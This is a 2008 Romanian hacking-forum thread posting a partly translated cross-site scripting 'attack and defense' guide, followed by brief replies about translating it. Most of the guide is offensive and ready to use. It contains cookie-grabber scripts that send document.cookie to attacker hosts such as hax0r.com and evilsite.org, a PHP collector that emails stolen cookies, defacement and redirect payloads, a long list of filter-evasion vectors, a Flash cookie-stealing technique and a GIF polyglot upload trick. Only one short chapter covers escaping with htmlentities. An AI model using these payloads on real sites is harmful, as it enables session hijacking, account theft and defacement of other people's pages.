CODEX Posted July 12, 2008 Report Posted July 12, 2008 ? ________________________________________________________|| Cross Site Scripting - Attack and Defense guide |________________________________________________________ By Xylitol . Tradus de CODEX in limba Romana pentru www.rstcenter.comINDEX : 1. Ce est un XSS ? 2. Unde si de ce apare XSS ? 3. Cum facem un cookie grabber 4. Cum ne aparam de un XSS 5. Metode deface 6. Filtre 7. Flash Atack 8. XSS Upload 9. Phishing XSS ______________________________________________| || .:: Capitolul 1 - Ce este un XSS ? ::. ||______________________________________________| In primul rand trebuie sa stim ca XSS este o vulnerabilitate ce apare la un server , site sipermite introducerea unui script pe pagina HTML de pe un server. Un xss gasit s afiseaza intr-un textbox . _________________________________________________| || .:: Capitolul 2 - Unde si de ce apare XSS? ::. ||_________________________________________________| Xss apre din cauza filtrari proaste a codului sau in multe cazuri nu se filtreaza chiar deloc. O sa iau urmatorul cod este folosit in majoritatea tutorialelor pt a semnifica XSS.COD :<html><head><title>Xss Vulnerabilitate</title></head><!-- html --!><!--cel mai bine e daca folositi html--!>.....................<form action="" method=post>codul Dvs:</br></br> <input type="text" name="xss"></br></br><input type="submit" value="XSSvul"></br></form>......................<!—mai departe e scriptul --!><?if(isset($xss)){....//Daca exista xss atunci vom indepliniCOD : echo \'$test \'; Aici apre Xss deoarece nu se filtreaza codul. codul este foarte slab incat nu poate filtra ca in cod sunt simboluri interzise ca : <> , / ' " etc.________________________________________________| |.: Chapter 3 - Make a cookie grabbers :.|________________________________________________|Insereaza acest cod intr-o pagina vulnerablia<script>window.open("http://www.Hax0r.com/cookie.php?cookies="+document.cookie);</script>(www.Hax0r.com = siteul tau)Deschideti notepad si faceti un document : cookie.phpcopy/past acest cod:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><title>Error</title><style type="text/css"><!--body,td,th {color: #FFFFFF;}body {background-color: #000000;}--></style></head><? mail('email@example.com', 'Cookie stealed ! - thx xyli ', $cookies); ?><body><h2>Error - Access denied for <? echo $_SERVER["REMOTE_ADDR"]; ?></h2></body></html> _____________________________________________| || .:: Chapter 4 - Securing XSS ::. ||_____________________________________________|FIX it:Pentru a scapa de Vulnerabilitatile XSS folosim htmlentities:in linea 16 inlocuim:<body><span class="alerte">Search result :</span><?php echo $_POST['Vulnerability']; ?></body>cu:<body><span class="alerte">Search result :</span><?phpif(isset($_POST['Vulnerability'])) { echo htmlentities($_POST['Vulnerability']); } ?></body>folosim htmlspecialchars() function in PHP alte functii:htmlentities() quotesstrip_tags()... ______________________________________________| | .: Chapter 5 - Metode de deface :.|_____________________________________________| Aici defeaceul se poate face simplu , asta nu inseamna ca ai acces la baza de date sau ca stergi siteul ci doar inserezi o in codul HTML , cum ar fi : Deface cu o imagine : sau un flash video<EMBED SRC="http://hax0r.com/Haxored.swf" redirect:<script>window.open( "http://www.hax0r.com/Haxored.html" )</script> deasemena vdeti si:<meta http-equiv="refresh" content="0; url=http://hax0r.com/Haxored.html" /> _______________________________________________| | .: Chapter 6 - Filtre si scripturi nefiltrate ::.|___ _________________________________________ <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;URL=http://;URL=javascript:alert('XSS');\"><META HTTP-EQUIV=\"refresh\"CONTENT=\"0;url=javascript:alert('XSS');\">'">><marquee><h1>XSS</h1></marquee>'">><script>alert('XSS')</script>'>><marquee><h1>XSS</h1></marquee>"><script alert(String.fromCharCode(88,83,83))</script><iframe<?php echo chr(11)?> onload=alert('XSS')></iframe><divstyle="x:expression((window.r==1)?'':eval('r=1;alert(String.fromCharCode(88,83,83));'))">window.alert("Xyli !");"/></a></><img src=1.gif onerror=alert(1)>mouse over<body onLoad="alert('XSS');"<body onunload="javascript:alert('XSS');">click me<script language="JavaScript">alert('XSS')</script>'); alert('XSS<font style='color:expression(alert(document.cookie))'><IMG DYNSRC=\"javascript:alert('XSS')\"><IMG LOWSRC=\"javascript:alert('XSS')\"></textarea><script>alert(/xss/)</script></title><script>alert(/xss/)</script><script src=http://yoursite.com/your_files.js></script>"><script>alert(0)</script><IMG SRC=javascript:alert(String.fromCharCode(88,83,83))><IMG SRC=\"jav ascript:alert('XSS');\"><IMG SRC=\"jav ascript:alert('XSS');\"><IMG SRC=\"jav ascript:alert('XSS');\"><marquee><script>alert('XSS')</script></marquee><? echo('<scr)';echo('ipt>alert(\"XSS\")</script>'); ?><IMG SRC=\"jav ascript:alert('XSS');\"><IMG SRC=\"jav ascript:alert('XSS');\"><marquee><script>alert('XSS')</script></marquee><style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style><img src=foo.png onerror=alert(/xssed/) /><script>alert(String.fromCharCode(88,83,83))</script><scr<script>ipt>alert('XSS');</scr</script>ipt><script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script><script src="http://www.evilsite.org/cookiegrabber.php"></script><script>alert('XSS');</script><script>alert(1);</script>aici sunt doar o parte mai multe gasiti pe google. _____________________________________________| | .: Chapter 7 - Flash attack :.|_____________________________________________|Flash is used for complex animations, simulations,*creation of games etc..What’s interesting for us is the getURL() action.This function allows us to redirect the end user to another page.its syntax is built as follows:getURL(url:String, [window: String,[method:String]])exemple:getURL("http://victime.com/login.php?logout=true","_self");url: indicate the URL of the sitewindow: specify within which framework the request must take place (_self, _blank…)method: method of request GET or POST (by defect GET)here the handling of the actionscript and the Javascript to post a alert:getURL("javascript:alert('XSS'");in 2002 one will show the danger of this facility,one could for example post the cookie of visitors in this manner:getURL("javascript:alert(document.cookie)")in December 2005, a new alternative and appearedconsisting has to benefit from a nonpermanent fault XSSand possibility of putting a file flash in its signature to give a permanent XSS,moreover the author of this alternative used this technique in orderto infect MySpace with a deviated worms xss of Samy: Samy Reloadedcookie stealer in flash ?not but there is technique to do itexemplein a flash file:GetURL("http://www.victime.com/page.php?var=<script src='http://www.hax0r.com/Haxored.js'></script>","_self");and in Haxored.js:document.location="http://hax0r.com/cookiestealer.php?cookie="+document.cookie;For secure it simple solution: do not allow flash files in your web app_____________________________________________|| .: Chapter 8 - XSS upload :.|______________________________________________| Facet Haxored.gif in paint spre exempluDupa ce ati deschis Haxored.GIF in notepadDati delete la to si inserati asta:GIF89a<script>alert("XSS")</script>Salvati si inchideti-oupload Haxored.gif intr-un free image hostingsi apare XSS...* In mozilla nu va apare eroarea , pentru a vedea eroarea folositi IEDe ce adaugam GIF89a ? well some upload like this one, check that the 'GIF89a' codeis contained in the image as in any .GIF respective.the vulnerability of this upload results from the checking 'GIF89a' codefor confirmation but of nothing the possible malicious codes contained in this image.GIF89a<script src="http://hax0r.com/cookiegrabber.php"></script>to know the code for another image format,it is just enough to open an image jpg or other with a text editor,for example a png file: ‰PNGPNG = ‰PNGGIF = GIF89aJPG = Quote
Hertz Posted July 12, 2008 Report Posted July 12, 2008 1)Macar daca le copiem..sa le punem in romana.2)Dezactiveaza smiles.3)Fa ceva pe trythis0ne ca n-ai nici 1 punct:D Quote
CODEX Posted July 12, 2008 Author Report Posted July 12, 2008 ok promit ca il traduc... incep acuma o sa fac ceva si pentru try.. Quote
best_bunnn Posted July 12, 2008 Report Posted July 12, 2008 man traducel si u cand ai timp ..nu k nu inteleg ce scrie dar sunt unele lucruri p care chiar nu le inteleg..... Quote
CODEX Posted July 12, 2008 Author Report Posted July 12, 2008 Asa e mai bine ? O sa mai adaug cate ceva la el ( partea care-i lpiseste sa fie " mai complet" Quote
Hertz Posted July 12, 2008 Report Posted July 12, 2008 Asa mai vi de acas':Ai indeplinit punctele 1 si 2.Astept 3:D Quote
CODEX Posted July 12, 2008 Author Report Posted July 12, 2008 Nah daca tot ai insistat 15 pct acuma tre sa trec si de celelate ca e interesant jocu Quote